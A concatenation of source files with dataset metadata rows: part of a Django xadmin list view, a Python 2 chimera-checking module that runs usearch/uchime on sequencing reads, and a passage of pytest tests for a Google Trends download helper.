item.text = smart_unicode(value)
else:
if isinstance(f.rel, models.ManyToOneRel):
field_val = getattr(obj, f.name)
if field_val is None:
item.text = mark_safe("<span class='text-muted'>%s</span>" % EMPTY_CHANGELIST_VALUE)
else:
item.text = field_val
else:
item.text = display_for_field(value, f)
if isinstance(f, models.DateField)\
or isinstance(f, models.TimeField)\
or isinstance(f, models.ForeignKey):
item.classes.append('nowrap')
item.field = f
item.attr = attr
item.value = value
# If list_display_links not defined, add the link tag to the first field
if (item.row['is_display_first'] and not self.list_display_links) \
or field_name in self.list_display_links:
item.row['is_display_first'] = False
item.is_display_link = True
if self.list_display_links_details:
item_res_uri = self.model_admin_url("detail", getattr(obj, self.pk_attname))
if item_res_uri:
if self.has_change_permission(obj):
edit_url = self.model_admin_url("change", getattr(obj, self.pk_attname))
else:
edit_url = ""
item.wraps.append('<a data-res-uri="%s" data-edit-uri="%s" class="details-handler" rel="tooltip" title="%s">%%s</a>'
% (item_res_uri, edit_url, _(u'Details of %s') % str(obj)))
else:
url = self.url_for_result(obj)
item.wraps.append(u'<a href="%s">%%s</a>' % url)
return item
@filter_hook
def result_row(self, obj):
row = ResultRow()
row['is_display_first'] = True
row['object'] = obj
row.cells = [self.result_item(
obj, field_name, row) for field_name in self.list_display]
return row
@filter_hook
def results(self):
results = []
for obj in self.result_list:
results.append(self.result_row(obj))
return results
@filter_hook
def url_for_result(self, result):
return self.get_object_url(result)
# Media
@filter_hook
def get_media(self):
media = super(ListAdminView, self).get_media() + self.vendor('xadmin.page.list.js', 'xadmin.page.form.js')
if self.list_display_links_details:
media += self.vendor('xadmin.plugin.details.js', 'xadmin.form.css')
return media
# Blocks
@inclusion_tag('xadmin/includes/pagination.html')
def block_pagination(self, context, nodes, page_type='normal'):
"""
Generates the series of links to the pages in a paginated list.
"""
paginator, page_num = self.paginator, self.page_num
pagination_required = (
not self.show_all or not self.can_show_all) and self.multi_page
if not pagination_required:
page_range = []
else:
ON_EACH_SIDE = {'normal': 5, 'small': 3}.get(page_type, 3)
ON_ENDS = 2
# If there are 10 or fewer pages, display links to every page.
# Otherwise, do some fancy
if paginator.num_pages <= 10:
page_range = range(paginator.num_pages)
else:
# Insert "smart" pagination links, so that there are always ON_ENDS
# links at either end of the list of pages, and there are always
# ON_EACH_SIDE links at either end of the "current page" link.
page_range = []
if page_num > (ON_EACH_SIDE + ON_ENDS):
page_range.extend(range(0, ON_EACH_SIDE - 1))
page_range.append(DOT)
page_range.extend(
range(page_num - ON_EACH_SIDE, page_num + 1))
else:
page_range.extend(range(0, page_num + 1))
if page_num < (paginator.num_pages - ON_EACH_SIDE - ON_ENDS - 1):
page_range.extend(
range(page_num + 1, page_num + ON_EACH_SIDE + 1))
page_range.append(DOT)
page_range.extend(range(
paginator.num_pages - ON_ENDS, paginator.num_pages))
else:
page_range.extend(range(page_num + 1, paginator.num_pages))
need_show_all_link = self.can_show_all and not self.show_all and self.multi_page
return {
'cl': self,
'pagination_required': pagination_required,
'show_all_url': need_show_all_link and self.get_query_string({ALL_VAR: ''}),
'page_range': map(self.get_page_number, page_range),
'ALL_VAR': ALL_VAR,
'1': 1,
}
| apache-2.0 | 725,250,696,843,273,700 | 38.016616 | 173 | 0.546827 | false |
avoorhis/vamps-node.js | public/scripts/node_process_scripts/gast/chimera.py | 1 | 34367 | import subprocess
import sys, os
import re
import time
from pipeline.pipelinelogging import logger
from pipeline.utils import Dirs, PipelneUtils
from pipeline.utils import *
from pprint import pprint
from collections import defaultdict, namedtuple
sys.path.append("/xraid/bioware/linux/seqinfo/bin")
sys.path.append("/Users/ashipunova/bin/illumina-utils")
sys.path.append("/Users/ashipunova/bin/illumina-utils/illumina-utils/scripts")
sys.path.append("/bioware/merens-illumina-utils")
#import fastalib as fa
import IlluminaUtils.lib.fastalib as fa
import pipeline.constants as C
import json
class Chimera:
""" Define here """
def __init__(self, runobj = None):
self.utils = PipelneUtils()
self.runobj = runobj
self.run_keys = self.runobj.run_keys
self.rundate = self.runobj.run
try:
self.use_cluster = self.runobj.use_cluster
except:
self.use_cluster = True
self.chg_suffix = ".chg"
self.chimeras_suffix = ".chimeras"
self.ref_suffix = ".db"
self.denovo_suffix = ".txt"
self.nonchimeric_suffix = "." + C.nonchimeric_suffix #".nonchimeric.fa"
self.chimeric_suffix = ".chimeric.fa"
self.base_suffix = "unique" + self.chimeras_suffix
try:
if self.runobj.lane_name:
lane_name = self.runobj.lane_name
else:
lane_name = ''
except:
lane_name = ''
if self.runobj.vamps_user_upload:
site = self.runobj.site
dir_prefix = self.runobj.user + '_' + self.runobj.run
self.dirs = Dirs(self.runobj.vamps_user_upload, dir_prefix, self.runobj.platform, lane_name = lane_name, site = site)
self.idx_keys = convert_unicode_dictionary_to_str(json.loads(open(self.runobj.trim_status_file_name,"r").read()))["new_lane_keys"]
self.indir = self.dirs.check_dir(self.dirs.trimming_dir)
self.outdir = self.dirs.check_dir(self.dirs.chimera_dir)
else:
site = ''
dir_prefix = self.runobj.run
self.dirs = Dirs(self.runobj.vamps_user_upload, dir_prefix, self.runobj.platform, lane_name = lane_name, site = site)
self.indir = self.dirs.check_dir(self.dirs.reads_overlap_dir)
self.outdir = self.dirs.check_dir(self.dirs.chimera_dir)
# self.usearch_cmd = C.usearch_cmd
self.usearch_cmd = C.usearch6_cmd
#self.abskew = C.chimera_checking_abskew
self.refdb = C.chimera_checking_refdb_6
self.its_refdb = C.chimera_checking_its_refdb_6
self.input_file_names = self.make_chimera_input_illumina_file_names()
# pprint(self.run_keys)
# self.output_file_names = self.make_chimera_output_illumina_file_names(self.input_file_names)
def make_chimera_input_illumina_file_names(self):
input_file_names = {}
for idx_key in self.run_keys:
file_name = idx_key + "_" + C.filtered_suffix + ".unique"
if os.path.exists(os.path.join(self.indir, file_name)):
input_file_names[idx_key] = file_name
return input_file_names
# def make_chimera_output_illumina_file_names(self, input_file_names):
# output_file_names = {}
# for idx_key, input_file_name in input_file_names.iteritems():
# output_file_names[idx_key] = input_file_name
# return output_file_names
def get_current_dirname(self, in_or_out = ""):
if in_or_out == "":
cur_dirname = self.indir
else:
cur_dirname = self.outdir
return cur_dirname
def is_chimera_check_file(self, filename):
return filename.endswith((self.chimeras_suffix + self.denovo_suffix, self.chimeras_suffix + self.ref_suffix, self.chimeric_suffix, self.nonchimeric_suffix))
def get_current_filenames(self, cur_dirname):
cur_file_names = []
if cur_dirname == self.indir:
cur_file_names = self.input_file_names.values()
elif cur_dirname == self.outdir:
cur_file_names = self.get_chimera_file_names(self.outdir)
return cur_file_names
def get_chimera_file_names(self, cur_dirname):
cur_file_names = []
for dirname, dirnames, filenames in os.walk(cur_dirname):
cur_file_names = [filename for filename in filenames if (self.is_chimera_check_file(filename))]
return cur_file_names
# def illumina_frequency_size(self, in_or_out = "", find = "frequency:", replace = ";size="):
# cur_dirname = self.get_current_dirname(in_or_out)
# cur_file_names = self.get_current_filenames(cur_dirname)
# # print "cur_file_names: "
# # pprint(cur_file_names)
# change_from_suffix = ""
# change_to_suffix = self.chg_suffix
# # print "find = %s, replace = %s" % (find, replace)
# regex = re.compile(r"%s" % find)
#
# for cur_file_name in cur_file_names:
# file_name = os.path.join(cur_dirname, cur_file_name)
# with open(file_name + change_from_suffix, "r") as sources:
# lines = sources.readlines()
# with open(file_name + change_to_suffix, "w") as target:
# for line in lines:
# target.write(regex.sub(replace, line))
def read_file(self, source_name):
with open(source_name, "r") as sources:
return sources.readlines()
def illumina_sed(self, lines, target_name, regex, replace, uppercase):
with open(target_name, "w") as target:
for line in lines:
if line.startswith(">"):
line1 = regex.sub(replace, line)
else:
if (uppercase):
line1 = line.upper()
else:
line1 = line
target.write(line1)
def call_illumina_sed(self, from_to):
"""
from_to = from_frequency_to_size or from_size_to_frequency
"""
sed_from_to = namedtuple('sed_from_to', 'find, replace, cur_dirname, cur_file_names, change_from_suffix, change_to_suffix, uppercase')
from_frequency_to_size = sed_from_to(
find = "frequency:",
replace = ";size=",
cur_dirname = self.indir,
cur_file_names = self.get_current_filenames(self.indir),
change_from_suffix = "",
change_to_suffix = self.chg_suffix,
uppercase = True
)
from_size_to_frequency = sed_from_to(
find = ";size=",
replace = "frequency:",
cur_dirname = self.outdir,
cur_file_names = self.get_chimera_file_names(self.outdir),
change_from_suffix = "",
change_to_suffix = "",
uppercase = False
)
if (from_to == "from_frequency_to_size"):
tuple_name = from_frequency_to_size
elif (from_to == "from_size_to_frequency"):
tuple_name = from_size_to_frequency
regex = re.compile(r"%s" % tuple_name.find)
# print "find = %s, replace = %s" % (find, replace)
if (not tuple_name.cur_file_names) and (tuple_name == from_frequency_to_size):
self.utils.print_both('ERROR: Did not find uniqued files (".unique") in %s, please check if the previous step has finished. Exiting.\n' % self.indir)
sys.exit()
for cur_file_name in tuple_name.cur_file_names:
file_name = os.path.join(tuple_name.cur_dirname, cur_file_name)
source_name = file_name + tuple_name.change_from_suffix
target_name = file_name + tuple_name.change_to_suffix
lines = self.read_file(source_name)
self.illumina_sed(lines, target_name, regex, tuple_name.replace, tuple_name.uppercase)
def illumina_freq_to_size_in_chg(self):
# TODO: not used?
find1 = "frequency:"
replace1 = ";size="
regex1 = re.compile(r"%s" % find1)
# print "cur_file_names: "
# pprint(cur_file_names)
cur_dirname = self.get_current_dirname()
cur_file_names = self.get_current_filenames(cur_dirname)
change_from_suffix = ""
change_to_suffix = self.chg_suffix
# print "find = %s, replace = %s" % (find, replace)
for cur_file_name in cur_file_names:
file_name = os.path.join(cur_dirname, cur_file_name)
with open(file_name + change_from_suffix, "r") as sources:
lines = sources.readlines()
with open(file_name + change_to_suffix, "w") as target:
# line2 = [regex1.sub(replace1, line) if line.startswith(">") else line.upper() for line in lines]
for line in lines:
if line.startswith(">"):
line1 = regex1.sub(replace1, line)
else:
line1 = line.upper()
# print line1
target.write(line1)
def illumina_size_to_freq_in_chimer(self):
find1 = ";size="
replace1 = "frequency:"
regex1 = re.compile(r"%s" % find1)
cur_file_names = self.get_chimera_file_names(self.outdir)
for file_chim in cur_file_names:
file_chim_path = os.path.join(self.outdir, file_chim)
with open(file_chim_path, "r") as sources:
lines = sources.readlines()
with open(file_chim_path, "w") as target:
for line in lines:
line1 = regex1.sub(replace1, line)
target.write(line1)
def illumina_rm_size_files(self):
for idx_key in self.input_file_names:
file_name = os.path.join(self.indir, self.input_file_names[idx_key] + self.chg_suffix)
if os.path.exists(file_name):
os.remove(file_name)
# def illumina_chimera_size_files(self):
#
# import os
# [os.rename(f, f.replace('_', '-')) for f in os.listdir('.') if not f.startswith('.')]
def check_if_cluster_is_done(self, time_before):
cluster_done = False
check_qstat_cmd_line = "qstat | grep \"%s\" | grep usearch | wc -l" % time_before
# check_qstat_cmd_line = "qstat | grep usearch"
self.utils.print_both("check_qstat_cmd_line = %s" % check_qstat_cmd_line)
try:
p = subprocess.Popen(check_qstat_cmd_line, stdout=subprocess.PIPE, shell=True)
(output, err) = p.communicate()
num_proc = int(output)
self.utils.print_both("qstat is running %s 'usearch' processes" % num_proc)
# pprint(p)
if (num_proc == 0):
cluster_done = True
# print "cluster_done from check_if_cluster_is_done = %s" % cluster_done
except:
self.utils.print_both("Chimera checking can be done only on a cluster.")
raise
return cluster_done
def create_chimera_cmd(self, input_file_name, output_file_name, ref_or_novo, ref_db = ""):
"""
http://www.drive5.com/usearch/manual/uchime_denovo.html
from usearch -help
Chimera detection (UCHIME ref. db. mode):
usearch -uchime q.fasta [-db db.fasta] [-chimeras ch.fasta]
[-nonchimeras good.fasta] [-uchimeout results.uch] [-uchimealns results.alns]
Chimera detection (UCHIME de novo mode):
usearch -uchime amplicons.fasta [-chimeras ch.fasta] [-nonchimeras good.fasta]
[-uchimeout results.uch] [-uchimealns results.alns]
Input is estimated amplicons with integer abundances specified using ";size=N".
usearch -uchime_denovo amplicons.fasta -uchimeout results.uchime
"""
uchime_cmd_append = ""
db_cmd_append = ""
dir_cmd_append = ""
if (ref_or_novo == "denovo"):
uchime_cmd_append = " -uchime_denovo "
output_file_name = output_file_name + self.chimeras_suffix + self.denovo_suffix
elif (ref_or_novo == "ref"):
uchime_cmd_append = " -uchime_ref "
output_file_name = output_file_name + self.chimeras_suffix + self.ref_suffix
db_cmd_append = " -db " + ref_db
dir_cmd_append = " -strand plus"
else:
self.utils.print_both("Incorrect method, should be \"denovo\" or \"ref\"")
self.utils.print_both("output_file_name = %s" % output_file_name)
uchime_cmd = C.clusterize_cmd
uchime_cmd += " "
uchime_cmd += self.usearch_cmd
uchime_cmd += uchime_cmd_append + input_file_name
uchime_cmd += db_cmd_append
uchime_cmd += " -uchimeout " + output_file_name
"""if we need nonchimeric for denovo and db separate we might create them here
# uchime_cmd += " -nonchimeras "
# uchime_cmd += (output_file_name + self.nonchimeric_suffix)
"""
uchime_cmd += " -chimeras " + (output_file_name + self.chimeric_suffix)
uchime_cmd += dir_cmd_append
uchime_cmd += " -notrunclabels"
# print "uchime_cmd FROM create_chimera_cmd = %s" % (uchime_cmd)
return uchime_cmd
def get_ref_db(self, dna_region):
ref_db = ''
if dna_region.upper() == 'ITS':
logger.debug("got an ITS dna region so using refdb: " + self.its_refdb)
ref_db = self.its_refdb
else:
logger.debug("using standard refdb: " + self.refdb)
ref_db = self.refdb
return ref_db
def chimera_checking(self, ref_or_novo):
chimera_region_found = False
output = {}
for idx_key in self.input_file_names:
# print "idx_key, self.input_file_names[idx_key] = %s, %s" % (idx_key, self.input_file_names)
input_file_name = os.path.join(self.indir, self.input_file_names[idx_key] + self.chg_suffix)
output_file_name = os.path.join(self.outdir, self.input_file_names[idx_key])
dna_region = self.runobj.samples[idx_key].dna_region
# print "dna_region = %s" % dna_region
if dna_region in C.regions_to_chimera_check:
chimera_region_found = True
else:
logger.debug('region not checked: ' + dna_region)
continue
# print "input_file_name = %s \noutput_file_name = %s" % (input_file_name, output_file_name)
ref_db = self.get_ref_db(dna_region)
# print "dna_region = %s; ref_db = %s; ref_or_novo = %s" % (dna_region, ref_db, ref_or_novo)
uchime_cmd = self.create_chimera_cmd(input_file_name, output_file_name, ref_or_novo, ref_db)
self.utils.print_both("\n==================\n%s command: %s" % (ref_or_novo, uchime_cmd))
try:
logger.info("chimera checking command: " + str(uchime_cmd))
output[idx_key] = subprocess.Popen(uchime_cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
except OSError, e:
self.utils.print_both("Problems with this command: %s" % (uchime_cmd))
if self.utils.is_local():
print >>sys.stderr, "Execution of %s failed: %s" % (uchime_cmd, e)
else:
print >>sys.stderr, "Execution of %s failed: %s" % (uchime_cmd, e)
self.utils.print_both("Execution of %s failed: %s" % (uchime_cmd, e))
raise
# ???
if not chimera_region_found:
return ('NOREGION', 'No regions found that need checking', '')
else:
return ("The usearch commands were created")
def get_chimeric_ids(self):
ids = set()
chimera_file_names = self.get_chimera_file_names(self.outdir)
file_ratio = self.check_chimeric_stats()
for file_name in chimera_file_names:
# print "from get_chimeric_ids: file_name = %s" % file_name
if file_name.endswith(self.chimeric_suffix):
both_or_denovo = self.get_chimeras_suffix(file_ratio, file_name)
# TODO: run ones for each file_base = ".".join(file_name.split(".")[0:3]) (for txt and db)
if file_name.endswith(both_or_denovo):
file_name_path = os.path.join(self.outdir, file_name)
self.utils.print_both("Get ids from %s" % file_name_path)
read_fasta = fa.ReadFasta(file_name_path)
ids.update(set(read_fasta.ids))
return ids
def get_chimeras_suffix(self, file_ratio, file_name):
""" use only de-novo (.txt) chimeric if
check_chimeric_stats shows
ratio ref to de-novo > 3
e.g.
if denovo_only:
chimeric_suffix = self.chimeras_suffix + self.denovo_suffix + self.chimeric_suffix
if no:
chimeras_suffix = self.chimeric_suffix
if file_name.endswith(chimeric_suffix):
...
# first_name, last_name = get_name()
"""
# for file_basename in file_ratio:
(percent_ref, ratio) = file_ratio[".".join(file_name.split(".")[0:3])]
chimeric_fa_suffix = ""
# print "percent_ref = %s, ratio = %s" % (percent_ref, ratio)
# if (percent_ref > 15) and (ratio > 2):
if ratio > 3:
chimeric_fa_suffix = self.chimeras_suffix + self.denovo_suffix + self.chimeric_suffix
else:
chimeric_fa_suffix = self.chimeric_suffix
return chimeric_fa_suffix
def move_out_chimeric(self):
chimeric_ids = self.get_chimeric_ids()
for idx_key in self.input_file_names:
fasta_file_path = os.path.join(self.indir, self.input_file_names[idx_key])
read_fasta = fa.ReadFasta(fasta_file_path)
read_fasta.close()
non_chimeric_file = fasta_file_path + self.nonchimeric_suffix
non_chimeric_fasta = fa.FastaOutput(non_chimeric_file)
fasta = fa.SequenceSource(fasta_file_path, lazy_init = False)
while fasta.next():
if not fasta.id in chimeric_ids:
non_chimeric_fasta.store(fasta, store_frequencies = False)
non_chimeric_fasta.close()
def check_chimeric_stats(self):
all_lines_suffix = self.denovo_suffix # ".txt" or ".db, doesn't matter"
chimera_ref_suffix = self.ref_suffix + self.chimeric_suffix #".db.chimeric.fa"
chimera_denovo_suffix = self.denovo_suffix + self.chimeric_suffix # ".txt.chimeric.fa"
filenames = self.get_basenames(self.get_current_filenames(self.outdir))
file_ratio = {}
for file_basename in filenames:
# print file_basename
all_lines = 0
ref_lines = 0
denovo_lines = 0
ratio = 0
percent_ref = 0
percent_denovo = 0
all_lines_file_name = os.path.join(self.outdir, file_basename + all_lines_suffix)
ref_lines_file_name = os.path.join(self.outdir, file_basename + chimera_ref_suffix)
denovo_lines_file_name = os.path.join(self.outdir, file_basename + chimera_denovo_suffix)
all_lines = int(self.wccount(all_lines_file_name) or 0)
ref_lines = int(self.get_fa_lines_count(ref_lines_file_name) or 0)
denovo_lines = int(self.get_fa_lines_count(denovo_lines_file_name) or 0)
# denovo_lines = int(denovo_lines or 0)
if (ref_lines == 0) or (all_lines == 0):
file_ratio[file_basename] = (0, 0)
continue
else:
percent_ref = self.percent_count(all_lines, ref_lines)
if (denovo_lines == 0):
file_ratio[file_basename] = (percent_ref, percent_ref) #use ref instead of ratio, because we are actually looking for a huge difference between ref and denovo (ref > 15 and denovo = 0)
continue
if (denovo_lines > 0):
ratio = self.count_ratio(ref_lines, denovo_lines)
percent_denovo = self.percent_count(all_lines, denovo_lines)
file_ratio[file_basename] = (percent_ref, ratio)
# percent_ref = int(percent_ref or 0)
if (percent_ref > 15):
self.utils.print_both("=" * 50)
self.utils.print_both(file_basename)
# print "all_lines_file_name = %s, ref_lines_file_name = %s, denovo_lines_file_name = %s" % (all_lines_file_name, ref_lines_file_name, denovo_lines_file_name)
self.utils.print_both("all_lines = %s, ref_lines = %s, denovo_lines = %s" % (all_lines, ref_lines, denovo_lines))
self.utils.print_both("ratio = %s" % ratio)
self.utils.print_both("percent_ref = %s, percent_denovo = %s" % (percent_ref, percent_denovo))
return file_ratio
def get_basenames(self, filenames):
file_basenames = set()
for f in filenames:
file_basename = ".".join(f.split(".")[0:3])
if file_basename.endswith(self.base_suffix):
file_basenames.add(file_basename)
return file_basenames
def wccount(self, filename):
return subprocess.check_output(['wc', '-l', filename]).split()[0]
def count_ratio(self, ref_num, denovo_num):
try:
return float(ref_num or 0) / float(denovo_num or 0)
except ZeroDivisionError:
# print "There is no denovo chimeras to count ratio."
pass
else:
raise
def get_fa_lines_count(self, file_name):
# todo: use fastalib to get cnt?
# return fa.SequenceSource(file_name, lazy_init = False).total_seq
try:
file_open = open(file_name)
return len([l for l in file_open.readlines() if l.startswith('>')])
except IOError, e:
self.utils.print_both(e)
return 0
# print "%s\nThere is no such file: %s" % (e, file_name)
else:
raise
def percent_count(self, all_lines, chimeric_count):
try:
return float(chimeric_count or 0) * 100 / float(all_lines or 0)
except ZeroDivisionError:
# print "There is no denovo chimeras to count ratio."
pass
else:
raise
"""
-----------------------------------------------------------------------------
For 454.
not tested
"""
def chimera_denovo(self):
chimera_region_found = False
output = {}
cluster_id_list = []
for idx_key in self.idx_keys:
input_file_name = os.path.join(self.indir, idx_key +'.abund.fa')
if os.path.isfile(input_file_name):
output_file_name = os.path.join(self.outdir, idx_key +'.chimera.denovo')
#open(output_file_name, 'a').close() # make sure file exists
log_file = os.path.join(self.outdir,idx_key+".denovo.log")
dna_region = self.runobj.samples[idx_key].dna_region
logger.debug("dna_region = %s" % dna_region)
if self.runobj.vamps_user_upload:
# VAMPS users can chimera check regardless of region chosen
chimera_region_found = True
else:
if dna_region in C.regions_to_chimera_check:
chimera_region_found = True
else:
logger.debug('region not checked: ' + dna_region)
continue
self.utils.print_both("input_file_name = %s \noutput_file_name = %s" % (input_file_name, output_file_name))
# uchime_cmd = C.clusterize_cmd
# uchime_cmd += " "
# uchime_cmd += self.usearch_cmd
# uchime_cmd += " --uchime "
# uchime_cmd += input_file_name
# uchime_cmd += " --uchimeout "
# uchime_cmd += output_file_name
# uchime_cmd += " --abskew "
# uchime_cmd += self.abskew
uchime_cmd=''
if self.use_cluster:
uchime_cmd += C.clusterize_cmd
uchime_cmd += " "
uchime_cmd += " -log "
uchime_cmd += log_file
uchime_cmd += " "
uchime_cmd += self.usearch_cmd
uchime_cmd += " -uchime_denovo "
uchime_cmd += input_file_name
uchime_cmd += " -uchimeout "
uchime_cmd += output_file_name
logger.debug("uchime_denovo_cmd = %s" % (uchime_cmd))
try:
logger.info("chimera denovo command: " + str(uchime_cmd))
# subprocess.Popen(uchime_cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
#output[idx_key] = subprocess.Popen(uchime_cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output[idx_key] = subprocess.check_output(uchime_cmd, shell=True)
self.utils.print_both("output[idx_key] = %s" % output[idx_key])
self.utils.print_both(output[idx_key].split()[2])
cluster_id_list.append(output[idx_key].split()[2])
except OSError, e:
self.utils.print_both("Problems with this command: %s" % (uchime_cmd))
if self.utils.is_local():
print >>sys.stderr, "Execution of %s failed: %s" % (uchime_cmd, e)
else:
print >>sys.stderr, "Execution of %s failed: %s" % (uchime_cmd, e)
self.utils.print_both("Execution of %s failed: %s" % (uchime_cmd, e))
raise
# ???
if not chimera_region_found:
return ('NOREGION', 'No regions found that need checking', '')
# ???
# for idx_key in output:
# if len(output[idx_key]) > 50 or len(output[idx_key]) < 40:
# return ('ERROR','uchime ref may have broken or empty', idx_key)
# finally
if cluster_id_list:
return ('SUCCESS', 'uchime ref seems to have been submitted successfully', cluster_id_list)
else:
return ('ERROR', 'uchime ref returned no cluster IDs', cluster_id_list)
def chimera_reference(self):
chimera_region_found = False
output = {}
cluster_id_list = []
for idx_key in self.run_keys:
dna_region = self.runobj.samples[idx_key].dna_region
if self.runobj.vamps_user_upload:
# VAMPS users can chimera check regardless of region chosen
chimera_region_found = True
else:
if dna_region in C.regions_to_chimera_check:
chimera_region_found = True
else:
logger.debug('region not checked: ' + dna_region)
continue
input_file_name = os.path.join(self.indir, idx_key +'.abund.fa')
output_file_name = os.path.join(self.outdir,idx_key+".chimera.ref")
#open(output_file_name, 'a').close() # make sure file exists
log_file = os.path.join(self.outdir,idx_key+".ref.log")
logger.debug("OUT FILE NAME: " + output_file_name)
#out_file_name = self.prefix[idx_key] + ".chimeras.db"
input_file_name = os.path.join(self.indir, idx_key +'.abund.fa')
if os.path.isfile(input_file_name):
output_file_name = os.path.join(self.outdir,idx_key+".chimera.ref")
#open(output_file_name, 'a').close() # make sure file exists
log_file = os.path.join(self.outdir,idx_key+".ref.log")
logger.debug("OUT FILE NAME: " + output_file_name)
# which ref db to use?
ref_db = ''
if dna_region.upper() == 'ITS':
logger.debug("got an ITS dna region so using refdb: " + self.its_refdb)
ref_db = self.its_refdb
else:
logger.debug("using standard refdb: " + self.refdb)
ref_db = self.refdb
uchime_cmd=''
if self.use_cluster:
uchime_cmd = C.clusterize_cmd
uchime_cmd += " "
uchime_cmd += " -log "
uchime_cmd += log_file
uchime_cmd += " "
uchime_cmd += self.usearch_cmd
uchime_cmd += " -uchime_ref "
uchime_cmd += input_file_name
uchime_cmd += " -uchimeout "
uchime_cmd += output_file_name
uchime_cmd += " -db "
uchime_cmd += ref_db
uchime_cmd += " -strand "
uchime_cmd += "plus"
logger.debug("uchime_ref_cmd = %s" % (uchime_cmd))
try:
logger.info("chimera reference command: " + str(uchime_cmd))
output[idx_key] = subprocess.check_output(uchime_cmd, shell=True)
#print 'outsplit',output[idx_key].split()[2]
cluster_id_list.append(output[idx_key].split()[2])
#print 'Have %d bytes in output' % len(output)
#print 'ref',idx_key,output,len(output)
if len(output[idx_key]) < 50 and len(output[idx_key]) > 40:
logger.debug(idx_key + " uchime ref seems to have been submitted successfully")
else:
if self.use_cluster:
print >>sys.stderr, "uchime ref may be broke"
self.utils.print_both("uchime ref may be broke")
except OSError, e:
print >>sys.stderr, "Execution of chimera_reference failed: %s" % (uchime_cmd, e)
self.utils.print_both("Execution of chimera_reference failed: %s" % (uchime_cmd, e))
raise
if not chimera_region_found:
return ('NOREGION','No regions found that need checking','')
for idx_key in output:
if (len(output[idx_key]) > 50 or len(output[idx_key]) < 40) and self.use_cluster:
return ('ERROR','uchime ref may have broken or empty',idx_key)
return ('SUCCESS','uchime ref seems to have been submitted successfully',cluster_id_list)
def write_chimeras_to_deleted_file(self):
for idx_key in self.run_keys:
# open deleted file and append chimera to it
# open and read both chimeras files: chimeras.db and chimeras.txt
# hash to remove dupes
chimera_deleted = {}
denovo_file = os.path.join(self.outdir, idx_key +'.chimera.denovo')
ref_file = os.path.join(self.outdir,idx_key+".chimera.ref")
# deleted file is in trimming dir for vampsuser
deleted_file = os.path.join(self.indir, idx_key+".deleted.txt")
for file in [denovo_file, ref_file]:
if os.path.isfile(file):
fh = open(file,"r")
# make a list of chimera deleted read_ids
for line in fh.readlines():
lst = line.strip().split()
id = lst[1].split(';')[0]
chimera_yesno = lst[-1]
if(chimera_yesno) == 'Y':
chimera_deleted[id] = 'chimera'
# open to append as trimming deletions are already there
fh_del = open(deleted_file,"a")
for id in chimera_deleted:
fh_del.write(id+"\tChimera\n")
fh_del.close()
# # http://drive5.com/uchime/uchime_quickref.pdf
# # The --uchimeout file is a tab-separated file with the following 17 fields.
# # Field Name Description
# # 1 Score Value >= 0.0, high score means more likely to be a chimera.
# # 2 Query Sequence label
# # 3 Parent A Sequence label
# # 4 Parent B Sequence label
# # 5 IdQM %id between query and model made from (A, crossover, B)
# # 6 IdQA %id between query and parent A.
# # 7 IdQB %id between query and parent B
# # 8 IdAB %id between parents (A and B).
# # 9 IdQT %id between query and closest reference sequence / candidate parent.
# # 10 LY Yes votes on left
# # 11 LN No votes on left
# # 12 LA Abstain votes on left
# # 13 RY Yes votes on right
# # 14 RN No votes on right
# # 15 RA Abstain votes on right
# # 16 Div Divergence ratio, i.e. IdQM - IdQT
# # 17 YN Y (yes) or N (no) classification as a chimera. Set to Y if score >= threshold
| mit | -1,459,004,407,187,858,000 | 44.04194 | 200 | 0.529549 | false |
ecsalina/gtrends | test_download.py | 1 | 4390 | # -*- coding: utf-8 -*-
import pytest
import getpass
import datetime
import gtrends
#SETUP
username = getpass.getpass("username: ")
password = getpass.getpass("password: ")
startDt = datetime.datetime(year=2006, month=1, day=1)
#countMonth = 1 for daily and 5 for weekly
#TEST DOES DOWNLOAD?
#many files
def testDownloadOneFile():
report = gtrends._downloadReport(username, password, ["banana"], startDt, 1,
1, '2m', '', '', '', '')
assert len(report) == 1
def testDownloadTwoFile():
report = gtrends._downloadReport(username, password, ["banana"], startDt, 2,
1, '2m', '', '', '', '')
assert len(report) == 2
def testDownloadThreeFile():
report = gtrends._downloadReport(username, password, ["banana"], startDt, 3,
1, '2m', '', '', '', '')
assert len(report) == 3
#many terms
def testDownloadTwoTerms():
report = gtrends._downloadReport(username, password, ["banana", "pie"], startDt, 1,
1, '2m', '', '', '', '')
assert len(report) == 1
def testDownloadThreeTerms():
report = gtrends._downloadReport(username, password, ["banana", "pie", "mango"], startDt, 1,
1, '2m', '', '', '', '')
assert len(report) == 1
#weird input
def testDownloadUnicode():
report = gtrends._downloadReport(username, password, [u"banana"], startDt, 1,
1, '2m', '', '', '', '')
assert len(report) == 1
def testDownloadUnicodeLatinChar():
report = gtrends._downloadReport(username, password, ["café"], startDt, 1,
1, '2m', '', '', '', '')
assert len(report) == 1
def testDownloadUnicodeNonLatinChar():
report = gtrends._downloadReport(username, password, ["咖啡店"], startDt, 1,
1, '2m', '', '', '', '')
assert len(report) == 1
def testDownloadNum():
report = gtrends._downloadReport(username, password, ["666"], startDt, 1,
1, '2m', '', '', '', '')
assert len(report) == 1
def testDownloadPunct():
report = gtrends._downloadReport(username, password, "~!@#$%^&*()_+-=;':[]{]\|,<.>/?}]", startDt, 1,
1, '2m', '', '', '', '')
assert len(report) == 1
#extra attributes (countries, categories, timezones, etc.)
def testDownloadGeo():
report = gtrends._downloadReport(username, password, ["ciao"], startDt, 1,
1, '2m', 'IT', '', '', '')
assert len(report) == 1
def testDownloadCat():
report = gtrends._downloadReport(username, password, ["ciao"], startDt, 1,
1, '2m', '', '0-7', '', '')
assert len(report) == 1
def testDownloadSearchType():
report = gtrends._downloadReport(username, password, ["ciao"], startDt, 1,
1, '2m', '', '', 'news', '')
assert len(report) == 1
def testDownloadTZ():
report = gtrends._downloadReport(username, password, ["ciao"], startDt, 1,
1, '2m', '', '', '', 'America/Detroit')
assert len(report) == 1
#TEST CORRECT DOWNLOAD?
#many terms
def testDownloadOneTermCorr():
report = gtrends._downloadReport(username, password, ["banana"], startDt, 1,
1, '2m', '', '', '', '')
lines = report[0].split("\n")
assert "banana" in lines[0]
def testDownloadTwoTermCorr():
report = gtrends._downloadReport(username, password, ["banana", "albero"], startDt, 1,
1, '2m', '', '', '', '')
lines = report[0].split("\n")
assert "banana" in lines[0] and "albero" in lines[0]
def testDownloadFiveTermCorr():
report = gtrends._downloadReport(username, password, ["banana", "albero", "finestra", "tutelare", "ambiente"], startDt, 1,
